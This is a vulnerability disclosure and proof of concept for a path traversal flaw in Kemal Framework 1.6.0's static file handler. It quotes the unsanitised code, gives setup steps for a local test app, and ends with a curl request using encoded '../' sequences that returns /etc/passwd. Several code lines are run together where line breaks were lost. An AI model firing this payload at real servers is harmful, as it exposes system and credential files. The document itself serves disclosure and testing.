📄 Kemal Framework 1.6.0 Path Traversal

Exploit Title: Kemal Framework 1.6.0 - Path Traversal
    Discovered by: Ahmet Ümit BAYRAM
    Discovered Date: 04.04.2025
    Vendor Homepage: https://github.com/kemalcr
    Software Link: https://github.com/kemalcr/kemal/archive/refs/tags/v1.6.0.zip
    Tested Version: v1.6.0 (latest)
    Tested on: Kali Linux
    CVE: (Waiting for response)
    
    🧩 Summary
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-summary>
    
    A *Path Traversal vulnerability* exists in the Kemal::StaticFileHandler
    class of *Kemal Framework v1.6.0*. When serving static files from a
    user-defined public directory, the framework fails to sanitize malicious ../
    sequences in user-supplied URIs. This allows unauthenticated attackers to
    access arbitrary files on the server.
    🛠️ Affected Version
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#️-affected-version>
    
       - Kemal Framework v1.6.0
    
    📌 Vulnerable Code
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-vulnerable-code>
    
    In src/kemal/static_file_handler.cr:
    
    request_path = URI.decode(original_path)
    file_path = File.join(@public_dir, request_path)
    if File.exists?(file_path)
      send_file(context, file_path)end
    
    No checks are performed to sanitize or reject traversal sequences (../),
    making it possible to access files outside the @public_dir.
    🔥 Proof-of-Concept (PoC)
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-proof-of-concept-poc>
    ✅ 1. Create a New Kemal Project
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-1-create-a-new-kemal-project>
    
    mkdir kemal-testcd kemal-test
    crystal init app .
    
    This command creates a sample Crystal application that includes a shard.yml
    file.
    ------------------------------
    ✅ 2. Edit shard.yml File
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-2-edit-shardyml-file>
    
    Edit the shard.yml file as follows:
    
    name: kemal-testversion: 0.1.0
    dependencies:
      kemal:
        github: kemalcr/kemal
    
    ------------------------------
    ✅ 3. Install the Required Packages
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-3-install-the-required-packages>
    
    shards install
    
    This command downloads and installs Kemal into the lib/ directory.
    ------------------------------
    ✅ 4. Edit src/kemal-test.cr File
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-4-edit-srckemal-testcr-file>
    
    Write the following content:
    
    require "kemal"
    
    get "/" do
      "Hello from Kemal!"end
    Kemal.config.public_folder = "./public"Kemal.run
    
    ------------------------------
    ✅ 5. Create public/ directory
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-5-create-public-directory>
    
    mkdir public
    
    ------------------------------
    ✅ 6. Start the Application
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-6-start-the-application>
    
    crystal run src/kemal-test.cr
    
    Go to the following address in your browser:
    
    http://localhost:3000
    
    If you see "Hello from Kemal!", everything is working perfectly 🚀
    ------------------------------
    ✅ 7. Test the Vulnerability
    <https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-7-test-the-vulnerability>
    
    curl "http://localhost:3000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
    
    If successful, the contents of /etc/passwd will be returned as shown below:
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    ...